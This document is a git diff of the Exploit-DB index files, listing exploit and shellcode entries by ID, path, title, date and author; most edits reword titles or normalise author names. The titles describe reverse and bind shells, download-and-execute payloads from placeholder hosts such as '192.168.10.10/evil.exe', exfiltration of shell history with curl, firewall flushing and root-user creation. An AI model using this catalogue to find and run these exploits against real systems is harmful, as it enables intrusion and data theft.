+48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,
+48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Mustafa Emre Gül",webapps,php,
+48260,exploits/java/webapps/48260.py,"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal",2020-03-27,hongphukt,webapps,java,
+48261,exploits/php/webapps/48261.py,"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution",2020-03-27,vikingfr,webapps,php,
+48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,
+48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,
+48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
+48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
+48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
+48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
+48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
+48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,
+48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php,
+48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
+48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
+48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
+48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 60b4d3069..37f30a06b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -4,7 +4,7 @@ id,file,description,date,author,type,platform
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell (/bin/sh) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
@@ -533,19 +533,19 @@ id,file,description,date,author,type,platform
 38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
 38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
 39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
-39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
+39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,Sathishshan,shellcode,linux_x86-64
 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
-39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
+39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,Sathishshan,shellcode,linux_x86-64
+39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,Sathishshan,shellcode,linux_x86-64
 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
+39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,Sathishshan,shellcode,linux_x86-64
 39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
-39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
-39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,Sathishshan,shellcode,linux_x86-64
+39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
-39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
 39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
 39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
@@ -661,7 +661,7 @@ id,file,description,date,author,type,platform
 43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
 43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
-43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43664,shellcodes/linux_x86/43664.c,"Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43666,shellcodes/linux_x86/43666.c,"Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43668,shellcodes/linux_x86/43668.c,"Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)",2009-01-01,bob,shellcode,linux_x86
 43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
@@ -671,7 +671,7 @@ id,file,description,date,author,type,platform
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
-43677,shellcodes/linux_x86/43677.c,"Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
+43677,shellcodes/linux_x86/43677.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43681,shellcodes/linux_x86/43681.c,"Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
@@ -703,7 +703,7 @@ id,file,description,date,author,type,platform
 43716,shellcodes/linux_x86/43716.c,"Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,"Jean Pascal Pereira",shellcode,linux_x86
 43707,shellcodes/linux_x86/43707.c,"Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)",2009-01-01,zillion,shellcode,linux_x86
 43719,shellcodes/linux_x86/43719.c,"Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)",2009-01-01,_fkz,shellcode,linux_x86
-43721,shellcodes/linux_x86/43721.c,"Linux/x86 - iptables --flush Shellcode (43 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43721,shellcodes/linux_x86/43721.c,"Linux/x86 - Flush IPTables Rules (iptables --flush) Shellcode (43 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
@@ -893,7 +893,7 @@ id,file,description,date,author,type,platform
 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
-46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
+46491,shellcodes/linux_x86/46491.c,"Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
@@ -901,13 +901,13 @@ id,file,description,date,author,type,platform
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
 45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86
 45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
-45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
+45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
 45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
 45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64
 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,shellcode,linux_mips
 45290,shellcodes/arm/45290.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)",2018-08-29,"Ken Kitahara",shellcode,arm
 45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
-45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse TCP (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
+45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
@@ -922,7 +922,7 @@ id,file,description,date,author,type,platform
 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm
 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
-45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
+45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
@@ -931,7 +931,7 @@ id,file,description,date,author,type,platform
 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
 46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
-46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
+46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86
 46275,shellcodes/linux_x86/46275.c,"Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes)",2019-01-29,"Daniele Votta",shellcode,linux_x86
@@ -943,12 +943,79 @@ id,file,description,date,author,type,platform
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
 46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
 46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86
-46393,shellcodes/macos/46393.c,"macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46394,shellcodes/macos/46394.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46394,shellcodes/macos/46394.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46396,shellcodes/macos/46396.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
 46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
 46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
-46524,shellcodes/linux_x86/46524.c,"Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
+46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
+46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
+46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
+46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
+46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
+46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
+46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Encoder Shellcode  (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
+46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)",2019-05-03,"Dave Sully",shellcode,generator
+46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
+46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
+46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
+46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
+46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
+46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
+46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
+46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
+46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
+46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
+47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64
+47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
+47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86
+47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
+47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86
+47043,shellcodes/linux_x86/47043.c,"Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
+47048,shellcodes/arm/47048.c,"Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) Shellcode (40 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47049,shellcodes/arm/47049.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47050,shellcodes/arm/47050.c,"Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
+47051,shellcodes/arm/47051.c,"Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
